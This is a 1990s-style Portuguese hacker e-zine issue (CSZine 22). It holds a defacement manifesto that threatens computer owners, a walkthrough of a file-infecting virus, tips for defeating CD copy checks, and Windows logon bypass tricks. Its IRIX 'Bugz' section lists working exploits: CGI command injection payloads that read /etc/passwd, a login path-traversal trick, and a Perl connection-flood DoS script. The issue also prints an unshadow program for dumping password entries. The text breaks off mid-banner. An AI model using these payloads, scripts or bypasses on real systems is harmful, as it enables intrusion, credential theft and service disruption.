cCCCc sSSSs zZZZZZZZZz ii NNn NN eEEEe 222 222 cCC CCc sSS SSs zZ II NNNn NN eEE EEe 22 22 22 22 cCC CC sSS SS zZ NN Nn NN eEE EE 22 22 22 22 cCCC SSSs zZ ii NN Nn NN eEEE ## 22 22 CCCC SSSs zZ II NN Nn NN EEEEEEEe ## 22 22 CCCC SSSs zZ II NN Nn NN EEEE 22 22 CCC cC Ss sSS zZ II NN NnNN EEe eE 22 22 CCc cCC SSs sSS zZ II NN NNN EEe eEE 22 22 CCCCC SSSSS zZZZZZZZZz II NN NN EEEEE 222222 222222 C S Z I N e - 2 2 øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø * E-Mail da revista : cszine@hotmail.com * Memoserv de Struck : /msg memoserv send Struck (Soh no irc.via-rs.com.br) * Page da revista : http://members.xoom.com/cszine øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Introduction: 22 - Dois patinhos na lagoa. Antes de começar eu quero colocar que eu meio que troquei as bolas lah na Invasão de Privacidade da edicao passada. O que o BO faz nao e' soh deixar que mapeem suas unidades. Com ele vc pode usar qquer recurço do siste- ma que tiver rodando o servidor. Desde mandar msgs para o usuario, ateh rebootar o computador dele. Eu nao to com saco de explicar como funciona esse brinquedinho, por isso deixei para a proxima edicao(quem sabe). A secao phreaking nao saiu porque essa edicao foi fechada muito em cima da csz21 e nem recebi emails sobre o assunto tratado na edicao passada. Atencao!! Nao me mandem emails querendo o email do Phoenix, nem eu sei. Ele e' meu colega de aula e manda as materias por disquete e via modem. øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Indice: Secao: Materia: Assunto: Autor: 1. Manifesto UHF Manifesto Ghost Invader 2. Kevin Mitnick TO MITNICK OR NOT MITNICK Bernie S. 3. Programação Anti-virus Leandro&Kelly Cheat Struck 4. VIRII Programando um virus Simon Phoenix 5. Crackerz Enganando o Programa Cheat Struck 6. Bugz Bugz para IRIX Simon Phoenix 7. Hacking para iniciantes Quebrando senhas(BSD, Win) Cheat Struck 8. Invasao de privacidade Obtendo prompt de root Cheat Struck 9. Hack, the Art Hacking via FTP [5 truques] Cheat Struck 10. Emails & BoNuS Como o nome jah diz.. Cheat Struck øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 1. Manifesto %%%%%%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø UHF Manifesto ¡¡¡Antenção!!! Esse manifesto se encontra em todas os hosts hackeados pela UHF. Nada foi alterado. Esta hp foi invadida pela organização hacker UHF. Voce quer saber porque invadimos hp?? Porque nós somos discriminados por voces, homens que dizem fazer justiça e governantes corruptos que afundam nosso país... Na sua sociedade mesquinha e corrupta somos chamados de bandidos perigosos com mentes criminosas e que queremos destruir o mundo.. O nosso crime nao seria ser mais inteligentes e aplicados do que vcs? Ja que sabem que o computador existira em cada casa do mundo porque nao se aprofundam mais nesse maravilhoso universo digital e tentem nos enten- der, ao inves de tirar nossa liberdade como no caso Mitnick. Pensem um pouco e tentem se lembrar de ah 2 anos atras... existia tantos hackers invadindo sistemas e alterando hps?? Voces deveriam pensar um pouco antes de nos denominar criminosos, talvez estejam ate gerando mais, ja que existem milhoes de "justiceiros digitais" que tambem se revoltam contra tamanha hipocrisia. Somos filhos de uma sociedade cruel e corrupta que voces mesmo gera- ram, e como tal nao somos tratados com dignidade paterna. Sempre que estiver perto de um computador na sua casa ou na sua empresa, lembrem-se, sempre estaremos la, dentro da sua maquina, esperando somente um motivo justo para acabar com voce.... Voce pode deter um de nos, mas nao podera deter todos.... 'Ghost Invader øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 2. Kevin Mitnick %%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø TO MITNICK OR NOT MITNICK? (por Bernie S.) - parte 2 - So' sete meses depois que isso veio a tona, e' que o cara passou a ser tratado como um preso comum. So' para se ter uma ideia: como as condicoes de prisao estabeleciam que o reu tinha que permanecer longe do telefone, ele foi mantido na solitaria 23 horas por dia, coisa de criminoso da pesada, que baguncava o coreto la' dentro. E' que o pessoal achava que era a unica forma de manter o dito longe dos telefones. A juiza sabia disso, mas nao deu a minima. Robert Morris, que fez o verme da Internet, causou prejuizos muito maiores e ficou em casa esperando a coisa se desenvolver. O pior de tudo e' que isso ai' mais ou menos se repetiu na segunda prisao. Um monte de acusacoes foi jogada em cima do cara, altos lances da midia que ganhou uma grana preta vendendo jornais sobre o fato e .. o compu- tador do Tsutomu Shimomura foi invadido de novo, depois que o cara tava na prisao. Parece que no livro "The Fugitive Game" Jonathan Littman, a historia e' um pouco menos parcial. O Littman era quem mantinha contato na imprensa com o foragido, coisa que o Markoff nao tinha. Mas tudo bem. Parece que foram US$ 750.000 no livro, US$ 200.000 na possibilidade de filme e qualquer coisa entre US$ 250-500.000 de direitos autorais para o exterior. Sem duvida, o crime compensa para quem prende o criminoso.Mitnick e' tudo o que falam dele? Nao sei. Tem trocentos artigos na Internet, incluindo o www.takedown.com (org?) com todos os detalhes que estao no livro. Nao vou pagar para ler o que posso conseguir de graca. E o "show" nao me interessa. Enfrento uma p(*) paranoia aqui na USP. Sem ter hackeado nada, tive minha conta "congelada" por meses. O pessoal que fez isso nem sequer pensou que se eu ficasse p(*) de raiva, se eu fosse um demente, poderia publicar detalhes de como hackear o proprio sistema onde trabalho, coisa que sempre me neguei a fazer. Faco um baita trabalho academico que a Universidade pode se gabar de ter sido pionei- ro na Internet e sou premiado com isso. E vou ler sobre a desgraca dos outros .. nao ganho para isso. A historia de um break-in tem varios lados: o que o cara fez, o que o sysop diz que ele fez e o que a imprensa diz que ele fez. O cara vai falar uma coisa x, que o sistema era facil de entrar, o sysop vai falar que o sistema era dificil (obvio, nao quer fazer papel de incompetente) , o garoto e' que e' um perigo. E a imprensa vai fazer um estardalhaco, para vender jornal, repetindo qualquer coisa que estimular a curiosidade dos leitores. Choses de la vie. As ultimas noticias sobre Mitnick sao de que ele fez um acordo com a Corte de Los Angeles, segundo o qual ele admite culpa pela posse ilegal de codigos de telefone celular e violar a condicional de uma condenacao 1989. Isso dai', de acordo com o advogado dele, John Yzurdiaga pode, atraves de um apelo, reduzir a sentenca para menos de um ano para o lance do celular e a sentenca maxima para a violacao de condicional e' de dois anos. O chato e' que o cara nao fez nenhum crime para ganhar dinheiro, mas por conta da curi- osidade. A sociedade o elegeu super-criminoso, mas nao o perdoou nem o re-integrou a seu meio. Ele tentou varios empregos quando foi liberado da outra vez, mas seu passado sempre o perseguia. Infelizmente, nao e' o unico caso de perseguicao implacavel. Nos EUA, esta' ficando comum o uso de sentencas pesadas para casos que, na justica comum, seriam passiveis de suspensao da pena ou coisa do genero, se o reu tiver algum comprometimento serio com hacking. Mais ou menos assim: se voce fez algo serio, mas que nao pode ser enquadrado como crime de hacking, pode acontecer que o sistema judiciario se aproveite de uma contravencao qualquer para colocar pressao em cima de voce. Nao so' nos EUA. Na Franca, um livro que foi recolhido por contar que um presidente frances, (que recentemente passou dessa para melhor) ja' tinha cancer e estava desenganado a bem mais tempo. O autor do livro resolveu colocar o mesmo na Internet. Nao vou dizer se tenho ou nao a copia, ta' em frances (sans aucun probleme por moi) e o assunto do livro nao me interessa. Porem o governo frances nao gostou da esperteza da coisa. E.. como condenar o cara? Na Internet e' territorio internacional. So' o Islam e a China resol- veram fazer "censura" naquilo que entra em seu territorio. Pega mal pacas pra Franca enveredar por este caminho por conta de um livro. Bom, o lancamento do livro foi feito num Cyber-cafe'. Foram prender o gerente. Por conta do livro, que nao foi ele que escreveu, so' ajudou a lancar na Internet? Nao, porque ele era (se nao me engano) foragido da policia por conta de nao pagamento da pensao alimenticia ou coisa do genero. Provavelmente, o dia em que centralizarem os bancos de dados sobre os individuos, talvez seja mais facil para qualquer delegado de policia exercer pressao sobre qualquer indi- viduo em relacao a qualquer coisa, como no caso desse gerente e no caso de varios outros que fazem coisas que sao apenas ilegais, mas nao necesariamente criminais. Mas, voltando ao assunto, o caso Mitnick nao e' mais Justica Comum. O sistema como um todo, ou pelo menos o sistema bancario e aquilo que compreen- de o sistema de telecomunicacoes, tipo AT&T e companhias telefonicas em geral , para nao dizer do governo em si, querem "botar para cristo" gente que possa mandar uma mensagem de que proibicoes devem ser respeitadas. E e' uma msg a cada jovem que use uma maquina como o computador para ir alem dos limites que tem como individuo. O Sistema (nao to falando do sistema operacional, mas de um todo que compreende uma piramide encabecada por todas as instituicoes, como sistema juridico, sistema de governo, sistema bancario, sistema educaci- onal etc) se sente ameacado pelo uso dos computadores. Se nao pode controlar o livre acesso do individuo a informacao, quer regular o uso que o individuo faz dela. Nem que seja pelo uso do terror, na forma de prisoes preventivas e interrogatorios "de rotina" em individuos algumas vezes despidos de qualquer intencao malevola. (fim da parte 2) øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 3. Programação %%%%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Anti virus Leandro & Kelly Essa materia deveria estar na secao VIRII, mas eu jah tenho assunto para ela. Esse programa verifica a existencia do virus Leandro & Kelly no boot da unidade e informa ao usuario. Voce pode escolher entre soh detectar ou remover. Nao vou explicar direitinho como funciona este virus de boot. Deixa isso para a próxima edição. ---------------------------Corte Aki--(REMLK.PAS)---------------------------- Program Anti_virii; USES Crt; const SoDetecta = false; Var unid : String[2]; function lerFisSetor(_seg,_ofs:word; trilha, setor, cab, unid:byte):Boolean; var tent : byte; carry : byte; Begin tent := 0; repeat carry := 0; asm mov ax,0201h mov es,_seg mov bx,_ofs mov ch, trilha mov cl, setor mov dh, cab mov dl, unid int 13h jnc @@1 mov carry, 1 @@1: end; tent := tent + 1; until (tent>5) or (carry=0); if (tent>5) and (carry<>0) then lerfissetor := false else lerfissetor := true; end; function EscrFisSetor(_seg,_ofs:word;trilha,setor,cab,unid:byte):boolean; var tent : byte; carry : byte; begin tent := 0; repeat carry := 0; asm mov ax,0301h mov es,_seg mov bx,_ofs mov ch, trilha mov cl, setor mov dh, cab mov dl, unid int 13h jnc @@1 mov carry, 1 @@1: end; tent := tent + 1; until (tent>5) or (carry=0); if (tent>5) and (carry<>0) then escrfissetor := false else escrfissetor := true; end; function BootTp_lk( Unid : byte ): Boolean; var bootTp : array[0..$400] of byte; Vitima : array[0..$200] of byte; _Ofs, _Seg : Word; vit_ofs, vit_seg : Word; tent : byte; carry : byte; tem : Boolean; trilha, setor, cab : byte; begin _Seg := Seg(BootTp); _Ofs := Ofs(BootTp); LerFisSetor(_seg, _ofs, 0, 1, 0, unid); Tem := true; if (BootTp[$20]) <> $0FA then Tem := false; if (BootTp[$21]) <> $0BC then Tem := false; if (BootTp[$22]) <> $000 then Tem := false; if (BootTp[$23]) <> $07C then Tem := false; if (BootTp[$24]) <> $033 then Tem := false; if (BootTp[$25]) <> $0C0 then Tem := false; if (BootTp[$26]) <> $08E then Tem := false; if (BootTp[$27]) <> $0D0 then Tem := false; if (BootTp[$28]) <> $0B8 then Tem := false; if (BootTp[$29]) <> $000 then Tem := false; if Tem then begin BootTp_lk := true; writeln(#7, 'ENCONTRADO VIRUS Leandro e Kelly na Unidade'); vit_seg := seg(vitima); vit_ofs := ofs(vitima); if not SoDetecta then begin trilha := boottp[$1d]; setor := boottp[$1c]; cab := boottp[$1f]; if not lerfissetor(vit_seg,vit_ofs,trilha,setor,cab,unid) then begin Writeln('ERRO de leitura no disco...'); Exit; end; if not escrfissetor(vit_seg,vit_ofs,0,1,0,unid) then begin writeln('ERRO de escrita no disco...'); exit; end else begin Writeln('REMOVIDO: Virus Leandro&Kelly da unidade.'); end; end; end else begin BootTp_lk := false; end; end; begin writeln(' AntiVirus Leandro&Kelly por Cheat Struck'); if ParamCount = 0 then begin writeln(#7, 'Faltou Definir Drive...'); Halt(1); end; unid := ParamStr(1); case UpCase(Unid[1]) of 'A':if not BootTp_lk(0) then writeln('Nada Encontrado...'); 'B':if not BootTp_lk(1) then writeln('Nada Encontrado...'); 'C':if not BootTp_lk($80) then writeln('Nada Encontrado...'); end; End. ----------------------------------------------------------------------------- øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%% % % % % %%%% % %%%%%%%%%%% %%%%%% %%%%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%%%%%%%% %%%%% 4. VIRII %%%%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%%%%%%%% %%%%%% %%%%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%% % % % % %%% % %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Programando um virus (por Simon Phoenix) ATENCAO!!! Esse texto e' extremamente complicado, eu nunca pensei em tentar explicar como montar um virus, mas tentei. Se vc achar que ta dificiul de entender, pare de ler e procure por textos de assembly e processadores da Intel. Ou fique soh nos trojans. Do contrario do que disse o Struck o nome do virus e' Amstrad, porem contem uma serie de dados iguais ao pixel, por isso nao eh corretamente reco- nhecido pelos Anti-Virus. Vamos usar o virus mostrado na edicao passada como exemplo. Esse e' um verdadeiro modelo de como nao se deve ser um virus. Ele nao altera a data, os atributos nem nada. Mas e' um bom modelo para começar. Abra o v1rv.com com o debug(debug v1rv.com) para lermos ele. Agora digite r e veja o primeiro comando do virus. -r AX=0000 BX=0000 CX=0151 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 DS=1885 ES=1885 SS=1885 CS=1885 IP=0100 NV UP EI PL NZ NA PO NC 1885:0100 EB14 JMP 0116 Note que o CX = 0151, isso e' o tamanho do programa(337B em hexa). Se voce ainda nao se familharisou com o DEBUG, jah ta' na hora, pois servira' tanto para virii quanto para cracking. O primeiro comando e' o 'JMP 0116' sendo assim o debug direcionará o virus para o IP 0116. Digite 'p' para executar o comando. Vamos seguir os comandos calmamente.. 1885:0116 MOV AX,CS ;O valor de CS e' 1885(note o ^^^^ sublinhado), sendo assim, AX=1885. 1885:0118 ADD AX,1000 ;Primeiro adiciona mais 1000 no AX 1885:011B MOV ES,AX (1885 + 1000 = 2885) e depois coloca este valor no ES(antigamente tambem era 1885). 1885:011D INC BYTE PTR [0105] ;Recorda que estamos em 1885:0105 . Logo veremos pra que serve. 1885:0121 MOV SI,0100 ;Indica o inicio do virus(DS:SI ou 1885:0100). 1885:0124 XOR DI,DI ;Indica o final do virus(ES:DI ou 2885:0000). 1885:0126 MOV CX,014F ;Indica o tamanho do virus(335B). 1885:0129 REPZ 1885:012A MOVSB Essa parte e' como uma area de definicoes no Pascal. Vejamos as seguintes: 1885:012B MOV DX,025F ;Isso executa a funcao 1A no Int 21, 1885:012E MOV AH,1A estabelecer a direcao do DTA em 1885:0130 INT 21 1885:025F(DS:DX). O DTA e' a zona de memoria. Essa zona como padrão se encontra em 1885:0080 (DS:0080), nos a mudamos para 1885:025F. Soh que agora os outros comandos vao escrever nessa zona tb. Para arrumar isso.. 1885:0132 MOV DX,0106 ;Isso faz com que o DTA haja com sua 1885:0135 MOV CX,0016 irmã(1885:0106). 1885:0138 MOV AH,4E 1885:013A INT 21 1885:013C JB 019E Para ver a zona de memoria irmã, digite no prompt do debug: d ds:106 Viu??? *.COM.O Este e' o ASCII que sera' procurado pelo virus. O 'MOV CX,16' deve ser bem explicado: Primeiro se transforma ele em binario: 1 0 1 1 0 | | | | | | | | | +---Arquivo somente leitura | | | +---Arquivo oculto | | +---Arquivo do sistema | +---Etiqueta de volume +---Diretorio Aqui o CX vale como se fosse atributos do Arquivo. Os que estao marcados com 1 quer dizer que e' um atributo valido, com 0 nao. Aqui vai uma lista de funcoes do comando 4E. CX = 1 ao 20 ;Atributo Reservados do Arquivo CX = 21 ;Atributo Geral do Arquivo CX = 22 a 23 ;Hora do Arquivo CX = 24 a 25 ;Data do arquivo CX = 26 a 29 ;Tamanho do arquivo CX = 30 a 42 ;Nome e extencao Essas funcoes tb valem para o comando 4F. Voltando ao virus..Digamos que o virus encontre um arquivo .COM, ele executaria a seguinte manobra entao: 1885:013E MOV DX,027D 1885:0141 MOV AX,3D02 1885:0144 INT 21 1885:0146 MOV [0114],AX 1885:0149 MOV BX,AX Isso abre o arquivo da area DS:DX(1885:027D) para leitura/escrita. Essa area apenas indica que o arquivo estah na zona DTA. O arquivo e' guarda- do em 1885:0114 e colocado em BX. Por hoje e' soh. E' muito chato explicar um virus, nao dah pra fazer isso numa soh edicao. Na CSZine23 eu acabo isso. Espero que estejam gostando porque to gastando um bucado de neuronios para isso. øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 5. Crackerz %%%%%%%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Enganando o Programa Sabe akeles programas ou jogos que precisam do CD para rodarem? Claro que sabe, porque eu perguntei. Aqui vou ensinar como fazer o programa acredi- tar que o CD estah no drive. Aqui vao algumas manhas: 1. Veja se existe um config.cfg em algum diretorio do jogo jah instalado no HD. Se existir abra-o e procure por uma linha tipo: CD-ROM DRIVE: D: Entao mudea para: CD-ROM DRIVE: C:\JOGOS\SIMCITY\ 2. Copie a parte do CD que e' usada pelo jogo para o um diretorio do HD. Entao resete o computador sem carregar o MSCDEX para o DOS nao reconhecer a unidade de CD-ROM(ele estah no autoexec.bat e config.sys). Entao entre no DOS e digite: subst D: C:\JOGOS\SIMCITY\ Essa dica soh funcionara' se o jogo for para DOS. 3. Depois de instalar o Jogo, rode um programa que particione o HD, assim a particao fica com o nome de D: e o jogo se confunde. Copie o conteudo do jogo do CD para essa particao. 4. Rode um editor hexadecimal no jogo e procure a palavra 'D:', altere tudo, inclusive os dirs para a unidade local(C:) e salve. Agora copie os diretorios que serao carregados pelo jogo, para o HD(na Raiz). 5. Rode um editor hexadecimal no jogo e procure pelo hexa 'CD 2F'(int 2F). Para quem nao sabe essa e' a interrupcao do CD. Esse meio e' dificio pq voce deve conhecer um pouco de assembly e um pouco dos codigos hexadecimais para alterar as instrucoes dessa int. øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 6. Bugz %%%%%%%%%%%%%%%%%%%%%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Bugz para IRIX (por Simon Phoenix) «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»« * Versões : 5.6 a 6.3 * Descrição : Sistema de logs * Exploit : Login: ../../etc/hosts.denny pass: LOGIN INCORRECT! Isso ira' modificar o /etc/hosts.allow, colocando um misero byte nele, dando acesso ao seu sistema a qquer um. Jah percebeu como funciona?? Voce pode criar quantos arquivos quizer no sistema, colocando o seu caminho no login. «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»« * Versão : 6.2 * Descrição : Executar comandos de maneira remota * Exploit : # telnet target.host.com 80 GET /cgi-bin/handler/qquercoisa;cat /etc/passwd| ?data=Download HTTP/1.0 «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»« * Versão : ?? * Descrição : Ataque DOS ao Identd * Exploit : Para os desenformados: Esse exploit foi escrito e perl(/usr/bin/perl) ---------------------------Corte Aki--(atack.pl)----------------------------- #include use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 6667 if (!$ARGV[1]); if (!$h) { print "Pon algun nombre de host. Ej: irc.arrakis.es\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); &connect; sub connect { print "Conexion en progreso:\n"; socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; print "Vamonos!\n"; select STDOUT; close S; &connect; } ----------------------------------------------------------------------------- «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»« * Versões : 6.2 e 6.3 * Descricão : Get /etc/passwd * Exploit : http://host.com.br/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»« * Versões : 6.3 e 6.4 * Descrição : Get /etc/passwd * Exploit: # telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd|? data=Download øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%% % % % % %%%% % %%%%% %%%%%% %%%%% %%%%% %%%%%%%% %% % %%% % %%%%%%%%% %%%%% 7. Hacking para iniciantes %%%% %%%%% %%% %%% % % %% % %%%%% %%%%%% %%%%% %%%%%%%%% %% %%%% % %% % % %%%%%%%%% %%%%%%% %%%%%% % % % % %%% % %%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Novo Unshadow Este programa e' uma variacao do unshadow original, para linux. Como o original (encontrado na page e em edicoes passadas) nao funciona em BSD's, aqui tah a fonte pronta para ser rodada. Nao estou certo do autor desse programa, soh pra deixar claro que nao fui eu que o atualizei. Nao sei se vou mudar lah na pagina, pois atualmente eu soh to colo- cando as novas edicoes da zine e deu. ---------------------------Corte Aki--(unshad.c)----------------------------- struct SHADOWPW { char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; int pw_quota; char *pw_comment; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd *getpwent(), *getpwuid(), *getpwnam(); #ifdef elxsi #define SHADOWPW "/etc/shadowpw" #define SHADOWPW_PAG "/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" #define CHANGE_TRIES 3 #define PASSWD_PROG "/bin/passwd" #define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT 100 #define BSD_CRIT 0 #define STR_CRIT 1 #define MAX_CRIT 1 #endif elxsi #define NULL 0 main() { struct passwd *p; int i; for (;1;) {3 p=getpwent(); if (p==NULL) return; printpw(p); } } printpw(a) struct SHADOWPW *a; { printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, a->pw_gecos,a->pw_dir,a->pw_shell); } ----------------------------------------------------------------------------- øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø Quebrando os passwords no Windows Pode ser coisa meio lamer, mas antes de falar qquer bobagem, leia o topic da secao("Hacking par *INICIANTES*"). Vou ensinar apenas algumas maneiras das diversas existentes de passar pelo logon de senha do Windows. *1* Reinicie o computador e tecle F8 quando anunciar que o windows esta carregando.. Escolha a opcao somente o prompt. Apos entrar no DOS, va ao diretorio do windows(padrao \WINDOWS) e de um dir *.pwl , O nome do arquivo e' o login da conta. Delete esses arquivos, ou renomeie-os para *.aaa . Volte para o windows e digite um novo login/senha. *2* No logon de inicio, basta nao digitar nada e clicar em cancelar. *3* Para escapar de um logon de uma protecao de tela, basta colocar um CD com autorun(para saber, verifique se existe o autorun.ini na raiz do drive de CD). O windows rodará o autorun do CD e esquecera' do screensaver. *4* Tecle Crtl+Alt+Del e finalize a janela do logon. *5* Edite o win.ini(pelo DOS se for preciso) e apague todas as linhas que contem as instrucoes: "load=" e "run=". Vou parar de escrever por aqui pois jah deu pra perceber a inseguran- ca que o Windows nos passa naum??? Como diz o floyd: O windows e' um otimo videogame ;) øØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØøØø %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%% % % % % %%%% % %%%%% %%%%%% %%%%%% 